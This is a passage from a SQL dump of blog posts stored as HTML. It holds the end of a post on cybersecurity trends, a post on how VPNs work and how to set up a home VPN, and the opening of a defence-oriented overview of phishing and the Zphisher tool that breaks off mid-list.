[&amp;&gt;ul]:!pb-0\" value=\"3\">Without proper security protocols, IoT vulnerabilities could multiply dramatically.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Essential strategies</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Use firewalls to segment IoT devices from critical systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Implement regular firmware updates for all connected devices.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. <b><strong class=\"font-bold\">Cybersecurity Skills Shortage and Automation Growth</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The rising demand for cybersecurity professionals is outpacing supply, creating a global skills shortage. To fill this gap, businesses are turning to automation.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Future insight</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">AI tools and automated workflows are reducing the burden on IT teams by handling repetitive tasks like threat detection and log analysis.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Advice for IT enthusiasts</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Upskilling in cybersecurity AI and automation will increase career opportunities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Businesses should combine automation with regular staff training for maximal efficiency.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Takeaways for IT Professionals</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The future of cybersecurity is both exciting and challenging. Here’s how you can be prepared:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Stay proactive</strong></b>—Threats are evolving. Adopt a mindset of continuous learning and technological adaptability.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Invest in technology</strong></b>—AI-powered defense tools and zero trust systems will be critical to staying ahead.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Collaborate</strong></b>—Cybersecurity isn’t a one-person job. Join communities, share knowledge, and stay connected with industry insights.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is no longer just a specialized niche—it’s a driving force behind how entire businesses operate. From addressing AI-driven malware to navigating the risks of IoT and quantum computing, IT leaders and technology enthusiasts are on the frontlines of securing our increasingly digital world.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Want to learn more about cybersecurity or start using cutting-edge security solutions in your organization? Stay ahead of the curve by diving deeper into these trends.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"></p>', '', NULL, NULL, 1, 'draft', '2025-01-17 15:05:51', '2026-01-12 21:41:44', 'Information Security', 'The Future of Cybersecurity: Trends to Watch in 2025 and Beyond', '', NULL),
(72, 'VPN Basics: Understanding How VPNs Work and Why They’re Essential for Public Networks', 'vpn-basics-understanding-how-vpns-work-and-why-theyre-essential-for-public-networks', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Technology enthusiasts and cybersecurity professionals alike recognize the importance of staying protected online. This is where Virtual Private Networks (VPNs) come into play. Whether you\'re concerned about securing your connection on public Wi-Fi or considering setting up a DIY VPN for your home, understanding how VPNs work and their critical role in network security is key.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here, we’ll explore what VPNs are, how they work, and why they’re essential, especially when connecting to public networks. Plus, we’ll show you how you can create your own VPN setup for home use!</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Is a VPN and How Does It Work?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A <b><strong class=\"font-bold\">VPN (Virtual Private Network)</strong></b> is a technology that creates a secure, encrypted connection wherever you access the Internet. Essentially, a VPN acts as a protective tunnel for your data, hiding sensitive information from prying eyes.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how it works in simple steps:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">When you connect to a VPN, your device (computer, smartphone, etc.) connects to a server through an encrypted tunnel.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Your internet activity is funneled through this server before accessing the broader internet.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Websites you visit or online services you use see the IP address of the VPN server instead of your personal IP address, offering added privacy.</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key takeaway:</strong></b> This encryption ensures that any data you send or receive is protected from hackers, especially on unsecured networks like public Wi-Fi.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Should You Use a VPN on Public Networks?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Public Wi-Fi networks, such as those in coffee shops, airports, or libraries, might seem convenient—but they can be very risky. These networks are often unsecured, making them a prime target for cybercriminals.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here are the top reasons why using a VPN in public networks is vital:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Protection Against Hackers</strong></b>: Without a VPN, cybercriminals can intercept your data (passwords, financial details, personal communications) with tools like packet sniffers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Secure Data Encryption</strong></b>: VPNs encrypt your data, making it unreadable to anyone attempting to intercept it.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Anonymity</strong></b>: A VPN hides your IP address, masking your online activities and preventing tracking from advertisers or malicious entities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Safeguarding Sensitive Work</strong></b>: For professionals working remotely, a VPN ensures sensitive work-related data stays protected, even when using public Wi-Fi.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Can You Make Your Own VPN for Home Use?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Absolutely! For tech enthusiasts and cybersecurity learners, creating a home VPN can be a rewarding project. <b><strong class=\"font-bold\">Setting up a DIY VPN for home use</strong></b> allows you to control your internet privacy without relying on third-party VPN providers.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how you can do it:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1: Choose Your VPN-Friendly Device</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">You’ll need a router, a NAS (Network Attached Storage) device, or even a spare computer to act as your VPN host. Devices like Raspberry Pi are popular choices for home VPN setups.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2: Select and Install VPN Software</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">There are free and paid options available. Popular DIY choices include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">OpenVPN (a highly secure, open-source VPN protocol)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">WireGuard (a faster, more modern alternative)</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3: Configure and Port-Forward Your Home Router</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Set up port forwarding on your router to allow a secure VPN connection from outside your local network. Make sure to pick a strong username and password for access.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 4: Test Your VPN</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once set up, connect to your VPN from an external device to confirm everything is working as intended. You now have secure remote access to your home network!</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Pro Tip:</strong></b> A home VPN is especially useful for accessing your personal files or devices remotely when you’re away from home, keeping your connection private and secure.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits of Building Your Own Home VPN</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Creating your own VPN takes some effort, but it offers unique advantages:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Full Control</strong></b>: You manage the server and have complete control over how your VPN operates.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Cost-Efficiency</strong></b>: Avoid recurring monthly fees from third-party providers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Enhanced Privacy</strong></b>: With your own VPN, no one else has access to your usage logs or data.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Learning Opportunity</strong></b>: It’s a great way to build your technical skills and gain hands-on experience with VPN technology.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Choosing the Right Public VPN Service</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Not ready to build a VPN from scratch or need something for travel? Choosing a reliable VPN provider is essential. Look for providers that offer the following:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Strong Encryption Protocols</strong></b> (e.g., AES-256 encryption)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">No-Logs Policy</strong></b> (ensures your activity isn’t tracked or stored)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Servers Around the World</strong></b> (helpful for accessing geo-restricted content)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Fast Connection Speeds</strong></b> (so your browsing and streaming aren’t interrupted)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Compatibility with Multiple Devices</strong></b> (PC, iPhone, Android, etc.)</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Popular options include NordVPN, ExpressVPN, and CyberGhost, all known for their trustworthiness and performance.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">From providing anonymity on public networks to empowering you to take control of your home internet security, VPNs are a must-have for anyone serious about online privacy and cybersecurity. For tech enthusiasts eager to learn, building a DIY home VPN is a worthy challenge. And for professionals seeking portable security, public VPN services are invaluable.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The next time you connect to free Wi-Fi at your favorite café, remember this: A VPN could be the difference between a safe connection and putting your data at risk.</p>', '', NULL, NULL, 1, 'draft', '2025-01-16 18:21:03', '2026-01-12 21:41:44', 'Information Security', 'VPN Basics: Understanding How VPNs Work and Why They’re Essential for Public Networks', '', NULL),
(73, 'The Rise of Phishing Attacks and the Role of Tools Like Zphisher', 'the-rise-of-phishing-attacks-and-the-role-of-tools-like-zphisher', '<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Introduction to Phishing Attacks</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing attacks have quickly become one of the most prevalent and dangerous threats in cybersecurity. These attacks often exploit human vulnerabilities, using deceptive tactics to extract sensitive data or unauthorized access to systems. The consequences? Financial loss, identity theft, and reputational damage on a global scale.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Among the many tools used in phishing schemes, one stands out for its notoriety and dual-purpose nature—<b><strong class=\"font-bold\">Zphisher</strong></b>, an open-source phishing framework. Understanding tools like Zphisher and the ways they’re misused or ethically utilized can help IT professionals and cybersecurity enthusiasts defend against these tactics.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Zphisher Unveiled</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Zphisher is a powerful and open-source tool made to replicate the login pages of popular websites like Facebook, Instagram, Gmail, and more. By automating the setup process, it simplifies the creation of convincing phishing pages that can lure unsuspecting users into providing credentials.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While Zphisher’s extreme ease-of-use makes it dangerous in the wrong hands, it also fulfills a valuable role in cybersecurity research, education, and ethical hacking. Understanding how it works is the first step in developing defenses against such tools.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Dual Nature of Zphisher</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Zphisher is a classic example of a double-edged sword in cybersecurity. Here\'s why:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Ethical Use</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Zphisher is often used by ethical hackers and cybersecurity professionals for penetration testing and security training.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">It helps organizations identify how phishing attempts exploit users, enabling better defenses.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">When used responsibly, it’s an educational tool for understanding attack methodologies.</li>\r\n</ul>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Malicious Use</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Attackers can use Zphisher to impersonate well-known sites, often with minimal effort, tricking victims into revealing sensitive information.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">The widespread accessibility of the tool lowers the barrier for entry, making it appealing to bad actors.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">It’s this dual purpose that emphasizes the importance of promoting ethical use and preventing malicious exploitation.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Vulnerabilities Highlighted by Tools Like Zphisher</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing attacks continue to evolve, employing increasingly sophisticated tactics. Tools such as Zphisher reveal these vulnerabilities in alarming ways. Here are some key insights:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Realistic Website Mimicry</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Using tools like Zphisher, attackers can create phishing pages that look nearly identical to legitimate websites. Subtle differences like domain names or unencrypted connections are often missed by users.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Trust-Based Exploitation</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Emails designed to impersonate communication from trusted institutions, such as banks or government services, often redirect victims to phishing pages managed by frameworks like Zphisher.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Global Impact</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing is a leading method for breaching security globally. It accounts for over one-third of data breaches worldwide—a statistic that reinforces the need for advanced defense strategies.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Global Impact of Phishing</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Phishing attacks have far-reaching consequences, from small-scale scams to corporate-level breaches. Here are some data points to consider:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Financial Damage</strong></b> - Costs attributed to phishing attacks are estimated to exceed <b><strong class=\"font-bold\">$17,700 per minute</strong></b> globally.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Identity Theft</strong></b> - Cybercriminals often resell stolen credentials or leverage them for further attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Reputational Risk</strong></b> - Organizations that fall victim to phishing see a loss in consumer trust, which can take years to rebuild.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These statistics underline the mission-critical need for organizations to stay ahead of phishing risks.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Responsible Use and Defense Against Phishing</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To combat phishing effectively, organizations and professionals must adopt a combination of proactive strategies and responsible tool usage. Here\'s how you can take action:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">1. Education and Training</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Provide regular phishing awareness sessions for employees. Many phishing attacks are successful because of human error. Share examples of recent phishing approaches to ensure your team stays updated.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">2. Enable Two-Factor Authentication (2FA)</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Attackers stealing credentials won\'t succeed if additional verification layers, like 2FA, are in place.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">3. Adopt Anti-Phishing Solutions</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" 